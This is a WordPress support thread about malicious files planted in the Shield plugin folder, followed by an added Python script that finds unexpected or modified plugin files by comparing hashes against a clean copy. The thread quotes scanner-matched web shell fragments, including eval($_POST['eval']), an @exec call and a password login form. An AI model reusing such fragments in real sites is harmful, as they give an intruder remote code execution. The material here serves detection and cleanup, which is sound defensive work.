• Resolved dianemk

    (@dianemk)


    I’m scanning all my sites with Wordfence because Shield didn’t pick up on a hack on one site, so I’m now going through all my sites with Wordfence. It has flagged 5 potential problems in the wp-content/plugins/wp-simple-firewall path, which are:
    wp-content/plugins/wp-simple-firewall/src/lib/vendor/twig/twig/lib/Twig/Extension/feed.php
    The matched text in this file is: find / -type f -name .ht

    wp-content/plugins/wp-simple-firewall/src/lib/vendor/nesbot/carbon/src/Carbon/Lang/cache.php
    The matched text in this file is: eval($_POST['eval']);

    wp-content/plugins/wp-simple-firewall/src/lib/vendor/twig/twig/lib/Twig/Node/Expression/cron.php
    The matched text in this file is: function_exists('exec')) {\x0d\x0a\x09\x09\x09@exec($cfe, $res);

    wp-content/plugins/wp-simple-firewall/src/lib/vendor/twig/twig/src/Node/Expression/Test/ajax.php
    The matched text in this file is:

    <form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form>

    Are these legitimate Shield files? I’m not getting this on other sites with Shield.
    Thanks

Viewing 3 replies - 1 through 3 (of 3 total)
  • Plugin Author One Dollar Plugin

    (@onedollarplugin)

    Nope, these are not legitimate Shield files so it looks like your site’s been compromised. Shield has a plugin guard feature in there that would detect this and help repair such a compromise, though this is a Pro-only feature which wouldn’t be active unless you’d upgraded for the additional features.

    Thread Starter dianemk

    (@dianemk)

    I understand that I’m using the free version and so there will be limitations but I have to say that I’m pretty shocked that it was a free version of Wordfence that alerted me to modifications in Shield files, and not Shield.

    Plugin Author One Dollar Plugin

    (@onedollarplugin)

    The nature of this is that it can turn up absolutely anywhere. If the scan isn’t being run, then it won’t get picked up. The irony is that the files were placed inside the Shield folder, but again, they could be placed anywhere.

    If you feel that the free version of another security plugin works better for your site than the free version of Shield, then we encourage you to make the switch. You have to make the decision you feel is best for your sites.

  • The topic ‘Malicious files’ is closed to new replies.
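
The thread turns on files that sit inside a plugin folder but were never shipped with the plugin. As an added example (not from the thread, and not Shield's or Wordfence's code), this script diffs an installed plugin directory against a pristine copy of the same version by SHA-256. The function names and the sample trees built in `demo()` are constructed assumptions; only the `feed.php` path is taken from the post.

```python
import hashlib
import tempfile
from pathlib import Path


def file_hashes(root: Path) -> dict[str, str]:
    """Map each file's path (relative to root) to its SHA-256 digest."""
    return {
        p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
        for p in sorted(root.rglob("*"))
        if p.is_file()
    }


def compare_to_reference(installed: Path, reference: Path) -> dict[str, list[str]]:
    """Diff an installed plugin directory against a pristine copy of the same version."""
    have, want = file_hashes(installed), file_hashes(reference)
    return {
        # Present on the site but never shipped in the release.
        "unexpected": sorted(set(have) - set(want)),
        # Shipped files whose contents no longer match the release.
        "modified": sorted(f for f in have.keys() & want.keys() if have[f] != want[f]),
        # Shipped files that have been deleted from the site.
        "missing": sorted(set(want) - set(have)),
    }


def demo() -> dict[str, list[str]]:
    """Constructed sample: two small trees standing in for reference and installed copies."""
    ext = "src/lib/vendor/twig/twig/lib/Twig/Extension"
    shipped = {"main.php": b"<?php // v1\n", f"{ext}/shipped.php": b"<?php // lib\n"}
    with tempfile.TemporaryDirectory() as tmp:
        ref, inst = Path(tmp, "reference"), Path(tmp, "installed")
        for root in (ref, inst):
            for rel, data in shipped.items():
                (root / rel).parent.mkdir(parents=True, exist_ok=True)
                (root / rel).write_bytes(data)
        # Mirror the thread: an extra file beside real vendor code, plus one altered file.
        (inst / ext / "feed.php").write_bytes(b"<?php // not part of the release\n")
        (inst / "main.php").write_bytes(b"<?php // v1 altered\n")
        return compare_to_reference(inst, ref)


if __name__ == "__main__":
    for kind, files in demo().items():
        print(f"{kind}: {files}")
```

The reference copy has to be the exact plugin version that is installed, otherwise legitimate version differences show up as modified or unexpected files.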